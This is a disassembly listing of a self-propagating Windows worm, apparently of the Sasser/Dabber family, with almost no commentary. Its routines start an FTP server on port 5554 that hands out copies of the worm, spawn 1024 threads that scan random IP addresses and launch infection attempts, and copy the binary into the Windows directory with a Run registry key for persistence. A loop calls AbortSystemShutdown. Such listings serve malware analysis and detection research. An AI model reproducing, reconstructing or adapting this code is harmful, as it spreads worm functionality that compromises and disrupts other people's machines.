loc_401AF5:				; CODE XREF: sub_401A84+42j
					; sub_401A84+65j
		push	esi
		call	sub_40159E
		add	esp, 10h
		push	esi
		call	sub_40127D
		pop	ecx

loc_401B05:				; CODE XREF: sub_401A84+1Fj
		pop	esi
sub_401A84	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401B08	proc near		; DATA XREF: sub_401E65+74o

var_8E4		= byte ptr -8E4h
Str		= byte ptr -4E4h
Source		= byte ptr -4E0h
Dest		= byte ptr -0E4h
var_60		= byte ptr -60h
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
Dst		= word ptr -28h
var_26		= word ptr -26h
var_24		= dword	ptr -24h
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
Delim		= byte ptr -4
var_2		= byte ptr -2
var_1		= byte ptr -1
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 8E4h
		push	ebx
		mov	ebx, [ebp+arg_0]
		cmp	ebx, 0FFFFFFFFh
		jz	loc_401E29
		push	esi
		push	edi
		push	0
		push	off_4068D0	; Str
		call	_strlen
		mov	esi, dword_4050F0
		pop	ecx
		push	eax
		push	off_4068D0
		push	ebx
		call	esi ; dword_4050F0
		mov	edi, [ebp+arg_0]
		jmp	short loc_401B46
; ---------------------------------------------------------------------------

loc_401B43:				; CODE XREF: sub_401B08+310j
		mov	ebx, [ebp+arg_0]

loc_401B46:				; CODE XREF: sub_401B08+39j
		push	0
		lea	eax, [ebp+Str]
		push	400h
		push	eax
		push	ebx
		call	dword_4050EC	; recv
		and	[ebp+eax+Str], 0
		mov	[ebp+var_10], eax
		lea	eax, [ebp+Str]
		push	offset aUser	; "USER"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_401B97
		push	0
		push	off_4068D4	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	off_4068D4
		jmp	loc_401E11
; ---------------------------------------------------------------------------

loc_401B97:				; CODE XREF: sub_401B08+73j
		lea	eax, [ebp+Str]
		push	offset aPass	; "PASS"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_401BC8
		push	0
		push	off_4068D8	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	off_4068D8
		jmp	loc_401E11
; ---------------------------------------------------------------------------

loc_401BC8:				; CODE XREF: sub_401B08+A4j
		lea	eax, [ebp+Str]
		push	offset aPort	; "PORT"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	loc_401CA4
		lea	eax, [ebp+Source]
		push	eax		; Source
		lea	eax, [ebp+Dest]
		push	eax		; Dest
		call	_strcpy
		mov	ax, word_406A60
		mov	word ptr [ebp+Delim], ax
		lea	eax, [ebp+Delim]
		push	eax		; Delim
		lea	eax, [ebp+Dest]
		push	eax		; Str
		call	_strtok
		add	esp, 10h
		mov	ebx, eax
		xor	edi, edi

loc_401C17:				; CODE XREF: sub_401B08+159j
		test	ebx, ebx
		jz	short loc_401C4B
		cmp	edi, 4
		jge	short loc_401C2E
		push	ebx
		call	sub_401E30
		pop	ecx
		mov	[ebp+edi*4+var_38], eax
		cmp	edi, 4

loc_401C2E:				; CODE XREF: sub_401B08+116j
		jnz	short loc_401C3A
		push	ebx
		call	sub_401E30
		pop	ecx
		mov	[ebp+var_18], eax

loc_401C3A:				; CODE XREF: sub_401B08:loc_401C2Ej
		cmp	edi, 5
		jnz	short loc_401C4E
		push	ebx
		call	sub_401E30
		pop	ecx
		mov	[ebp+var_14], eax
		jmp	short loc_401C4E
; ---------------------------------------------------------------------------

loc_401C4B:				; CODE XREF: sub_401B08+111j
		push	6
		pop	edi

loc_401C4E:				; CODE XREF: sub_401B08+135j
					; sub_401B08+141j
		lea	eax, [ebp+Delim]
		push	eax		; Delim
		push	0		; Str
		call	_strtok
		inc	edi
		pop	ecx
		cmp	edi, 6
		pop	ecx
		mov	ebx, eax
		jl	short loc_401C17
		push	[ebp+var_2C]
		mov	edi, [ebp+var_18]
		lea	eax, [ebp+var_60]
		push	[ebp+var_30]
		shl	edi, 8
		push	[ebp+var_34]
		add	edi, [ebp+var_14]
		push	[ebp+var_38]
		push	offset aI_I_I_I	; "%i.%i.%i.%i"
		push	eax
		call	dword_4050E0	; wsprintfA
		add	esp, 18h
		push	0
		push	off_4068E0	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	off_4068E0
		jmp	loc_401DD7
; ---------------------------------------------------------------------------

loc_401CA4:				; CODE XREF: sub_401B08+D5j
		lea	eax, [ebp+Str]
		push	offset aRetr	; "RETR"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	loc_401DDC
		push	0
		push	off_4068E4	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	off_4068E4
		push	ebx
		call	esi ; dword_4050F0
		lea	eax, [ebp+var_60]
		push	eax
		call	sub_4011D5
		mov	ebx, eax
		pop	ecx
		test	ebx, ebx
		jz	loc_401DB9
		push	10h		; Size
		lea	eax, [ebp+Dst]
		push	0		; Val
		push	eax		; Dst
		call	_memset
		add	esp, 0Ch
		mov	[ebp+Dst], 2
		push	edi
		call	dword_4050F4	; ntohs
		push	0
		push	1
		push	2
		mov	[ebp+var_26], ax
		mov	[ebp+var_24], ebx
		call	dword_4050F8	; socket
		mov	ebx, eax
		cmp	ebx, 0FFFFFFFFh
		mov	[ebp+var_C], ebx
		jz	loc_401DB9
		lea	eax, [ebp+Dst]
		push	10h
		push	eax
		push	ebx
		call	dword_4050FC	; connect
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_401D44
		push	ebx
		call	dword_40511C	; closesocket
		jmp	short loc_401DB9
; ---------------------------------------------------------------------------

loc_401D44:				; CODE XREF: sub_401B08+231j
		lea	eax, [ebp+var_8E4]
		push	400h
		push	eax
		push	0
		call	dword_405034	; GetModuleFileNameA
		lea	eax, [ebp+var_8E4]
		push	0
		push	eax
		call	dword_405030	; _lopen
		cmp	eax, 0FFFFFFFFh
		mov	[ebp+var_8], eax
		jz	short loc_401DB9
		lea	eax, [ebp+var_2]
		push	offset Source	; Source
		push	eax		; Dest
		call	_strcpy
		mov	ebx, dword_40502C
		pop	ecx
		pop	ecx
		lea	eax, [ebp+var_2]
		push	1
		push	eax
		push	[ebp+var_8]

loc_401D8E:				; CODE XREF: sub_401B08+2A6j
		call	ebx ; dword_40502C
		cmp	eax, 1
		jnz	short loc_401DB0
		and	[ebp+var_1], 0
		push	0
		push	eax
		lea	eax, [ebp+var_2]
		push	eax
		push	[ebp+var_C]
		call	esi ; dword_4050F0
		lea	eax, [ebp+var_2]
		push	1
		push	eax
		push	[ebp+var_8]
		jmp	short loc_401D8E
; ---------------------------------------------------------------------------

loc_401DB0:				; CODE XREF: sub_401B08+28Bj
		push	[ebp+var_8]
		call	dword_40501C	; _lclose

loc_401DB9:				; CODE XREF: sub_401B08+1DDj
					; sub_401B08+21Bj ...
		push	[ebp+var_C]
		call	dword_40511C	; closesocket
		push	0
		push	off_4068DC	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	off_4068DC

loc_401DD7:				; CODE XREF: sub_401B08+197j
		push	[ebp+arg_0]
		jmp	short loc_401E12
; ---------------------------------------------------------------------------

loc_401DDC:				; CODE XREF: sub_401B08+1B1j
		lea	eax, [ebp+Str]
		push	offset aQuit	; "QUIT"
		push	eax		; Str
		call	_strstr
		pop	ecx
		test	eax, eax
		pop	ecx
		jz	short loc_401DFC
		push	ebx
		call	dword_40511C	; closesocket
		jmp	short loc_401E14
; ---------------------------------------------------------------------------

loc_401DFC:				; CODE XREF: sub_401B08+2E9j
		push	0
		push	off_4068DC	; Str
		call	_strlen
		pop	ecx
		push	eax
		push	off_4068DC

loc_401E11:				; CODE XREF: sub_401B08+8Aj
					; sub_401B08+BBj
		push	ebx

loc_401E12:				; CODE XREF: sub_401B08+2D2j
		call	esi ; dword_4050F0

loc_401E14:				; CODE XREF: sub_401B08+2F2j
		cmp	[ebp+var_10], 0
		jg	loc_401B43
		push	[ebp+arg_0]
		call	dword_40511C	; closesocket
		pop	edi
		pop	esi

loc_401E29:				; CODE XREF: sub_401B08+10j
		xor	eax, eax
		pop	ebx
		retn	4
sub_401B08	endp

; =============== S U B	R O U T	I N E =======================================

sub_401E30	proc near		; CODE XREF: sub_401B08+119p
					; sub_401B08+129p ...

arg_0		= dword	ptr  4

		push	esi
		mov	esi, [esp+4+arg_0]
		push	edi
		xor	edi, edi

loc_401E38:				; CODE XREF: sub_401E30+13j
		mov	al, [esi]
		cmp	al, 20h
		jz	short loc_401E42
		cmp	al, 9
		jnz	short loc_401E45

loc_401E42:				; CODE XREF: sub_401E30+Cj
		inc	esi
		jmp	short loc_401E38
; ---------------------------------------------------------------------------

loc_401E45:				; CODE XREF: sub_401E30+10j
					; sub_401E30+2Ej
		movsx	eax, byte ptr [esi]
		push	eax		; C
		call	_isalnum
		test	eax, eax
		pop	ecx
		jz	short loc_401E60
		movsx	ecx, byte ptr [esi]
		lea	eax, [edi+edi*4]
		inc	esi
		lea	edi, [ecx+eax*2-30h]
		jmp	short loc_401E45
; ---------------------------------------------------------------------------

loc_401E60:				; CODE XREF: sub_401E30+21j
		mov	eax, edi
		pop	edi
		pop	esi
sub_401E30	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401E65	proc near		; DATA XREF: WinMain(x,x,x,x)+79o

var_14		= word ptr -14h
var_12		= word ptr -12h
var_10		= dword	ptr -10h
var_4		= byte ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	esi
		xor	esi, esi
		push	edi
		push	esi
		push	1
		push	2
		call	dword_4050F8	; socket
		mov	edi, eax
		cmp	edi, 0FFFFFFFFh
		jnz	short loc_401E89

loc_401E81:				; CODE XREF: sub_401E65+63j
		pop	edi
		xor	eax, eax
		pop	esi
		retn	4
; ---------------------------------------------------------------------------

loc_401E89:				; CODE XREF: sub_401E65+1Aj
		push	15B2h
		mov	[ebp+var_14], 2
		call	dword_4050F4	; ntohs
		mov	[ebp+var_12], ax
		lea	eax, [ebp+var_14]
		push	10h
		push	eax
		push	edi
		mov	[ebp+var_10], esi
		call	dword_405118	; bind
		cmp	eax, 0FFFFFFFFh
		jz	short loc_401EC1
		push	5
		push	edi
		call	dword_405100	; listen
		cmp	eax, 0FFFFFFFFh
		jnz	short loc_401ECA

loc_401EC1:				; CODE XREF: sub_401E65+4Cj
		push	edi
		call	dword_40511C	; closesocket
		jmp	short loc_401E81
; ---------------------------------------------------------------------------

loc_401ECA:				; CODE XREF: sub_401E65+5Aj
					; sub_401E65+89j
		push	esi
		push	esi
		push	edi
		call	dword_4050E8	; accept
		lea	ecx, [ebp+var_4]
		push	ecx
		push	esi
		push	eax
		push	offset sub_401B08
		push	esi
		push	esi
		call	dword_405038	; CreateThread
		push	19h
		call	dword_405028	; Sleep
		jmp	short loc_401ECA
sub_401E65	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: noreturn

sub_401EF0	proc near		; DATA XREF: WinMain(x,x,x,x)+8Do

Source		= byte ptr -454h
var_438		= byte ptr -438h
Dest		= byte ptr -400h

		sub	esp, 454h
		push	ebx
		push	ebp
		mov	ebp, dword_4050E0
		push	esi
		push	edi
		mov	esi, 0FFh

loc_401F05:				; CODE XREF: sub_401EF0+134j
		lea	eax, [esp+464h+var_438]
		push	eax
		call	sub_4010D2
		pop	ecx
		lea	eax, [esp+464h+var_438]
		push	eax
		call	dword_40510C	; inet_addr
		movsx	edi, al
		test	edi, edi
		movsx	ebx, ah
		jge	short loc_401F2B
		add	edi, 100h

loc_401F2B:				; CODE XREF: sub_401EF0+33j
		test	ebx, ebx
		jge	short loc_401F35
		add	ebx, 100h

loc_401F35:				; CODE XREF: sub_401EF0+3Dj
		call	sub_401000
		push	1Fh
		pop	ecx
		idiv	ecx
		cmp	edx, 0Fh
		jle	short loc_401F92
		call	sub_401000
		push	1Fh
		pop	ecx
		idiv	ecx
		cmp	edx, 0Fh
		jle	short loc_401F78
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		jmp	short loc_401F8F
; ---------------------------------------------------------------------------

loc_401F78:				; CODE XREF: sub_401EF0+63j
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		push	ebx

loc_401F8F:				; CODE XREF: sub_401EF0+86j
		push	edi
		jmp	short loc_401FBE
; ---------------------------------------------------------------------------

loc_401F92:				; CODE XREF: sub_401EF0+53j
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx
		call	sub_401000
		mov	ecx, esi
		idiv	ecx
		push	edx

loc_401FBE:				; CODE XREF: sub_401EF0+A0j
		lea	eax, [esp+474h+Source]
		push	offset aI_I_I_I	; "%i.%i.%i.%i"
		push	eax
		call	ebp ; dword_4050E0
		add	esp, 18h
		lea	eax, [esp+464h+Source]
		push	eax
		call	sub_401153
		cmp	al, 1
		pop	ecx
		jnz	short loc_40201C
		lea	eax, [esp+464h+Dest]
		push	400h
		push	eax
		push	0
		call	dword_405034	; GetModuleFileNameA
		lea	eax, [esp+464h+Dest]
		push	offset asc_406A7C ; " "
		push	eax		; Dest
		call	_strcat
		lea	eax, [esp+46Ch+Source]
		push	eax		; Source
		lea	eax, [esp+470h+Dest]
		push	eax		; Dest
		call	_strcat
		add	esp, 10h
		lea	eax, [esp+464h+Dest]
		push	0
		push	eax
		call	dword_40503C	; WinExec

loc_40201C:				; CODE XREF: sub_401EF0+EAj
		push	19h
		call	dword_405028	; Sleep
		jmp	loc_401F05
sub_401EF0	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

; int __stdcall	WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)

_WinMain@16	proc near		; CODE XREF: start+C9p

var_14		= dword	ptr -14h
var_8		= byte ptr -8
var_4		= byte ptr -4
hInstance	= dword	ptr  8
hPrevInstance	= dword	ptr  0Ch
Str		= dword	ptr  10h
nShowCmd	= dword	ptr  14h

		push	ebp
		mov	ebp, esp
		push	ecx
		push	ecx
		push	esi
		push	edi
		mov	edi, dword_405048
		xor	esi, esi
		push	offset aJobaka3	; "Jobaka3"
		push	esi
		push	esi
		call	edi ; dword_405048
		call	dword_405044	; GetTickCount
		push	eax
		call	sub_40101E
		call	sub_401028
		push	[ebp+Str]	; Str
		call	_strlen
		pop	ecx
		test	eax, eax
		pop	ecx
		jbe	short loc_402072
		push	[ebp+Str]
		call	sub_401A84
		pop	ecx
		push	1
		pop	eax

loc_40206C:				; CODE XREF: WinMain(x,x,x,x)+6Aj
		pop	edi
		pop	esi
		retn	10h
; ---------------------------------------------------------------------------

loc_402072:				; CODE XREF: WinMain(x,x,x,x)+35j
		push	1
		call	sub_4020D7
		mov	[esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
		push	esi
		push	esi
		call	edi ; dword_405048
		call	dword_405040	; RtlGetLastWin32Error
		cmp	eax, 0B7h
		jnz	short loc_402095
		xor	eax, eax
		jmp	short loc_40206C
; ---------------------------------------------------------------------------

loc_402095:				; CODE XREF: WinMain(x,x,x,x)+66j
		mov	edi, dword_405038
		lea	eax, [ebp+var_4]
		push	ebx
		push	eax
		push	esi
		push	esi
		push	offset sub_401E65
		push	esi
		push	esi
		call	edi ; dword_405038
		mov	ebx, 400h

loc_4020B0:				; CODE XREF: WinMain(x,x,x,x)+97j
		lea	eax, [ebp+var_8]
		push	eax
		push	esi
		push	esi
		push	offset sub_401EF0
		push	esi
		push	esi
		call	edi ; dword_405038
		dec	ebx
		jnz	short loc_4020B0
		pop	ebx

loc_4020C3:				; CODE XREF: WinMain(x,x,x,x)+ACj
		push	esi
		call	dword_405000	; AbortSystemShutdownA
		push	0BB8h
		call	dword_405028	; Sleep
		jmp	short loc_4020C3
_WinMain@16	endp

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4020D7	proc near		; CODE XREF: WinMain(x,x,x,x)+4Bp

var_824		= byte ptr -824h
var_425		= byte ptr -425h
Dest		= byte ptr -424h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 824h
		push	esi
		mov	esi, 400h
		lea	eax, [ebp+var_824]
		push	esi
		push	eax
		push	0
		call	dword_405034	; GetModuleFileNameA
		lea	eax, [ebp+Dest]
		push	esi
		push	eax
		call	dword_405050	; GetWindowsDirectoryA
		lea	eax, [ebp+Dest]
		push	eax		; Str
		call	_strlen
		cmp	[ebp+eax+var_425], 5Ch
		pop	ecx
		pop	esi
		jz	short loc_40212F
		lea	eax, [ebp+Dest]
		push	offset asc_406ACC ; "\\"
		push	eax		; Dest
		call	_strcat
		pop	ecx
		pop	ecx

loc_40212F:				; CODE XREF: sub_4020D7+43j
		push	off_4068C8	; Source
		lea	eax, [ebp+Dest]
		push	eax		; Dest
		call	_strcat
		cmp	[ebp+arg_0], 0
		pop	ecx
		pop	ecx
		jz	short loc_40215F
		lea	eax, [ebp+Dest]
		push	0
		push	eax
		lea	eax, [ebp+var_824]
		push	eax
		call	dword_40504C	; CopyFileA

loc_40215F:				; CODE XREF: sub_4020D7+70j
		lea	eax, [ebp+var_4]
		push	eax
		push	offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	80000002h
		call	dword_405004	; RegOpenKeyA
		lea	eax, [ebp+Dest]
		push	eax		; Str
		call	_strlen
		pop	ecx
		push	eax
		lea	eax, [ebp+Dest]
		push	eax
		push	1
		push	0
		push	off_4068C8
		push	[ebp+var_4]
		call	dword_405008	; RegSetValueExA
		push	[ebp+var_4]
		call	dword_40500C	; RegCloseKey
sub_4020D7	endp

; ---------------------------------------------------------------------------
		align 10h
		align 10h
		align 10h
		align 10h
		align 10h
		align 10h
		align 10h
; ---------------------------------------------------------------------------
		mov	eax, [ebp-14h]
		mov	ecx, [eax]
		mov	ecx, [ecx]
		mov	[ebp-68h], ecx
		push	eax
		push	ecx
		call	__XcptFilter
		pop	ecx
		pop	ecx
; ---------------------------------------------------------------------------
		mov	esp, [ebp-18h]
		push	dword ptr [ebp-68h]
		call	__exit
		pop	ecx
		pop	ecx
; [00000024 BYTES: COLLAPSED FUNCTION _fast_error_exit.	PRESS KEYPAD "+" TO EXPAND]
		align 10h
; [00000005 BYTES: COLLAPSED CHUNK OF FUNCTION ___from_strstr_to_strchr. PRESS KEYPAD "+" TO EXPAND]
		align 10h
; [000000B6 BYTES: COLLAPSED FUNCTION ___from_strstr_to_strchr.	PRESS KEYPAD "+" TO EXPAND]
; [00000132 BYTES: COLLAPSED FUNCTION ___crtGetEnvironmentStringsA. PRESS KEYPAD "+" TO	EXPAND]
		align 10h
; [00000020 BYTES: COLLAPSED FUNCTION __global_unwind2.	PRESS KEYPAD "+" TO EXPAND]
; [00000022 BYTES: COLLAPSED FUNCTION __unwind_handler.	PRESS KEYPAD "+" TO EXPAND]
; [00000068 BYTES: COLLAPSED FUNCTION __local_unwind2. PRESS KEYPAD "+"	TO EXPAND]
; [00000023 BYTES: COLLAPSED FUNCTION __abnormal_termination. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

		push	ebx
		push	ecx
		mov	ebx, offset dword_406D8C
		jmp	short loc_4034A0
		align 10h
		push	esi
		inc	ebx
		xor	dh, [eax]
		pop	eax
		inc	ebx
		xor	[eax], dh
; ---------------------------------------------------------------------------

unknown_libname_2:			; Microsoft VisualC 2-8/net runtime
		push	ebp
		mov	ecx, [esp+8]
		mov	ebp, [ecx]
		mov	eax, [ecx+1Ch]
		push	eax
		mov	eax, [ecx+18h]
		push	eax
		call	__local_unwind2
		add	esp, 8
		pop	ebp
		retn	4
; [0000002B BYTES: COLLAPSED FUNCTION ___sbh_find_block. PRESS KEYPAD "+" TO EXPAND]
; [0000032B BYTES: COLLAPSED FUNCTION ___sbh_free_block. PRESS KEYPAD "+" TO EXPAND]
; [00000309 BYTES: COLLAPSED FUNCTION ___sbh_alloc_block. PRESS	KEYPAD "+" TO EXPAND]
; [000000B1 BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_region. PRESS KEYPAD "+"	TO EXPAND]
; [000000FB BYTES: COLLAPSED FUNCTION ___sbh_alloc_new_group. PRESS KEYPAD "+" TO EXPAND]
		align 10h
		align 10h
		align 2

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk

sub_404CA6	proc near		; CODE XREF: __global_unwind2+13p
		jmp	dword_405080
sub_404CA6	endp

; ---------------------------------------------------------------------------
		dd 0D5h	dup(0)
dword_405000	dd 77E34D78h	; resolved to->ADVAPI32.AbortSystemShutdownAdword_405004	dd 77DFC41Bh	; resolved to->ADVAPI32.RegOpenKeyAdword_405008	dd 77DDEBE7h	; resolved to->ADVAPI32.RegSetValueExAdword_40500C	dd 77DD6BF0h	; resolved to->ADVAPI32.RegCloseKey		dd 0
dword_405014	dd 7C801D77h	; resolved to->KERNEL32.LoadLibraryAdword_405018	dd 7C80BE01h	; resolved to->KERNEL32.lstrcpyA					; sub_40127D+8Fr ...
dword_40501C	dd 7C834E64h	; resolved to->KERNEL32._lclose					; sub_401B08+2ABr
dword_405020	dd 7C838AE7h	; resolved to->KERNEL32._lwritedword_405024	dd 7C8365A5h	; resolved to->KERNEL32._lcreatdword_405028	dd 7C802442h	; resolved to->KERNEL32.Sleep					; sub_40159E+4D0r ...
dword_40502C	dd 7C8353CEh	; resolved to->KERNEL32._lreaddword_405030	dd 7C85E830h	; resolved to->KERNEL32._lopendword_405034	dd 7C80B4CFh	; resolved to->KERNEL32.GetModuleFileNameA					; sub_401EF0+F8r ...
dword_405038	dd 7C810637h	; resolved to->KERNEL32.CreateThread					; WinMain(x,x,x,x):loc_402095r
dword_40503C	dd 7C86136Dh	; resolved to->KERNEL32.WinExecdword_405040	dd 7C910331h	; resolved to->NTDLL.RtlGetLastWin32Errordword_405044	dd 7C80929Ch	; resolved to->KERNEL32.GetTickCountdword_405048	dd 7C80E93Fh	; resolved to->KERNEL32.CreateMutexAdword_40504C	dd 7C8286EEh	; resolved to->KERNEL32.CopyFileAdword_405050	dd 7C821363h	; resolved to->KERNEL32.GetWindowsDirectoryAdword_405054	dd 7C80ADA0h	; resolved to->KERNEL32.GetProcAddressdword_405058	dd 7C9179FDh	; resolved to->NTDLL.RtlReAllocateHeapdword_40505C	dd 7C809A51h	; resolved to->KERNEL32.VirtualAlloc					; ___sbh_alloc_new_group+51r
dword_405060	dd 7C9105D4h	; resolved to->NTDLL.RtlAllocateHeap					; ___sbh_heap_init+Dr ...
dword_405064	dd 7C8127A7h	; resolved to->KERNEL32.GetOEMCPdword_405068	dd 7C809915h	; resolved to->KERNEL32.GetACPdword_40506C	dd 7C812E76h	; resolved to->KERNEL32.GetCPInfo					; _setSBUpLow+14r
dword_405070	dd 7C80A490h	; resolved to->KERNEL32.GetStringTypeW					; ___crtGetStringTypeA+12Dr
dword_405074	dd 7C838A0Ch	; resolved to->KERNEL32.GetStringTypeA					; ___crtGetStringTypeA+8Dr
dword_405078	dd 7C809BF8h	; resolved to->KERNEL32.MultiByteToWideChar					; ___crtGetStringTypeA+11Br ...
dword_40507C	dd 7C810D87h	; resolved to->KERNEL32.WriteFiledword_405080	dd 7C937A40h	; resolved to->NTDLL.RtlUnwinddword_405084	dd 7C91043Dh	; resolved to->NTDLL.RtlFreeHeap					; ___sbh_free_block+2C4r ...
dword_405088	dd 7C809AE4h	; resolved to->KERNEL32.VirtualFreedword_40508C	dd 7C812BB6h	; resolved to->KERNEL32.HeapCreatedword_405090	dd 7C810EF8h	; resolved to->KERNEL32.HeapDestroydword_405094	dd 7C810E51h	; resolved to->KERNEL32.GetFileType					; __ioinit+166r
dword_405098	dd 7C80CCA8h	; resolved to->KERNEL32.LCMapStringW					; ___crtLCMapStringA+14Dr ...
dword_40509C	dd 7C838DE8h	; resolved to->KERNEL32.LCMapStringA					; ___crtLCMapStringA+A7r
dword_4050A0	dd 7C80B6A1h	; resolved to->KERNEL32.GetModuleHandleAdword_4050A4	dd 7C801EEEh	; resolved to->KERNEL32.GetStartupInfoAdword_4050A8	dd 7C812F1Dh	; resolved to->KERNEL32.GetCommandLineAdword_4050AC	dd 7C8111DAh	; resolved to->KERNEL32.GetVersiondword_4050B0	dd 7C81CDDAh	; resolved to->KERNEL32.ExitProcess					; _doexit+91r
dword_4050B4	dd 7C801E16h	; resolved to->KERNEL32.TerminateProcessdword_4050B8	dd 7C80DDF5h	; resolved to->KERNEL32.GetCurrentProcessdword_4050BC	dd 7C862E2Ah	; resolved to->KERNEL32.UnhandledExceptionFilterdword_4050C0	dd 7C81DF77h	; resolved to->KERNEL32.FreeEnvironmentStringsAdword_4050C4	dd 7C814AE7h	; resolved to->KERNEL32.FreeEnvironmentStringsWdword_4050C8	dd 7C80A0D4h	; resolved to->KERNEL32.WideCharToMultiByte					; ___crtLCMapStringA+20Dr
dword_4050CC	dd 7C81CF5Bh	; resolved to->KERNEL32.GetEnvironmentStringsA					; ___crtGetEnvironmentStringsA+E1r
dword_4050D0	dd 7C812F08h	; resolved to->KERNEL32.GetEnvironmentStringsWdword_4050D4	dd 7C80CC97h	; resolved to->KERNEL32.SetHandleCountdword_4050D8	dd 7C812F39h	; resolved to->KERNEL32.GetStdHandle					; __NMSG_WRITE+143r
		align 10h
dword_4050E0	dd 7E41A8ADh	; resolved to->USER32.wsprintfA					; sub_40127D+B7r ...
		align 8
dword_4050E8	dd 71AC1028h	; resolved to->WS2_32.acceptdword_4050EC	dd 71AB615Ah	; resolved to->WS2_32.recv					; sub_40159E+2DDr ...
dword_4050F0	dd 71AB428Ah	; resolved to->WS2_32.send					; sub_401398+151r ...
dword_4050F4	dd 71AB2B66h	; resolved to->WS2_32.ntohs					; sub_40127D+27r ...
dword_4050F8	dd 71AB3B91h	; resolved to->WS2_32.socket					; sub_40127D+51r ...
dword_4050FC	dd 71AB406Ah	; resolved to->WS2_32.connect					; sub_40127D+6Cr ...
dword_405100	dd 71AB88D3h	; resolved to->WS2_32.listendword_405104	dd 71AB50C8h	; resolved to->WS2_32.gethostnamedword_405108	dd 71AB3F41h	; resolved to->WS2_32.inet_ntoadword_40510C	dd 71AB2BF4h	; resolved to->WS2_32.inet_addr					; sub_4011D5+7r ...
dword_405110	dd 71AB4FD4h	; resolved to->WS2_32.gethostbyname					; sub_4011D5+1Er ...
dword_405114	dd 71AB664Dh	; resolved to->WS2_32.WSAStartupdword_405118	dd 71AB3E00h	; resolved to->WS2_32.binddword_40511C	dd 71AB9639h	; resolved to->WS2_32.closesocket					; sub_40127D+10Fr ...
		dd 2 dup(0)
dword_405128	dd 0FFFFFFFFh, 402915h,	402929h, 746E7572h, 20656D69h		dd 6F727265h, 2072h, 0A0Dh, 534F4C54h, 72652053h, 0D726F72h
		dd 0Ah,	474E4953h, 72726520h, 0A0D726Fh, 0
		dd 414D4F44h, 65204E49h, 726F7272h, 0A0Dh, 32303652h, 2D0A0D38h
		dd 616E7520h, 20656C62h, 69206F74h, 6974696Eh, 7A696C61h
		dd 65682065h, 0A0D7061h, 0
aR6027NotEnough	db 'R6027',0Dh,0Ah
		db '- not enough space for lowio initialization',0Dh,0Ah,0
		align 4
aR6026NotEnough	db 'R6026',0Dh,0Ah
		db '- not enough space for stdio initialization',0Dh,0Ah,0
		align 10h
aR6025PureVirtu	db 'R6025',0Dh,0Ah
		db '- pure virtual function call',0Dh,0Ah,0
		align 4
aR6024NotEnough	db 'R6024',0Dh,0Ah
		db '- not enough space for _onexit/atexit table',0Dh,0Ah,0
		align 10h
aR6019UnableToO	db 'R6019',0Dh,0Ah
		db '- unable to open console device',0Dh,0Ah,0
		align 4
aR6018Unexpecte	db 'R6018',0Dh,0Ah
		db '- unexpected heap error',0Dh,0Ah,0
		align 10h
aR6017Unexpecte	db 'R6017',0Dh,0Ah
		db '- unexpected multithread lock error',0Dh,0Ah,0
		align 10h
aR6016NotEnough	db 'R6016',0Dh,0Ah
		db '- not enough space for thread data',0Dh,0Ah,0
aAbnormalProgra	db 0Dh,0Ah
		db 'abnormal program termination',0Dh,0Ah,0
		align 10h
aR6009NotEnough	db 'R6009',0Dh,0Ah
		db '- not enough space for environment',0Dh,0Ah,0
aR6008NotEnough	db 'R6008',0Dh,0Ah
		db '- not enough space for arguments',0Dh,0Ah,0
		align 4
aR6002FloatingP	db 'R6002',0Dh,0Ah      ; DATA XREF: .text:off_406DA4o
		db '- floating point not loaded',0Dh,0Ah,0
		align 10h
aMicrosoftVisua	db 'Microsoft Visual C++ Runtime Library',0 ; DATA XREF: __NMSG_WRITE+119o
		align 4
; char asc_4053E8[]
asc_4053E8	db 0Ah			; DATA XREF: __NMSG_WRITE+F1o
		db 0Ah,0
		align 4
; char aRuntimeErrorPr[]
aRuntimeErrorPr	db 'Runtime Error!',0Ah ; DATA XREF: __NMSG_WRITE+D3o
		db 0Ah
		db 'Program: ',0
		align 4
; char a___[]
a___		db '...',0              ; DATA XREF: __NMSG_WRITE+BFo
; char aProgramNameUnk[]
aProgramNameUnk	db '<program name unknown>',0 ; DATA XREF: __NMSG_WRITE+7Do
		align 4
dword_405424	dd 0							; ___crtLCMapStringA+36o
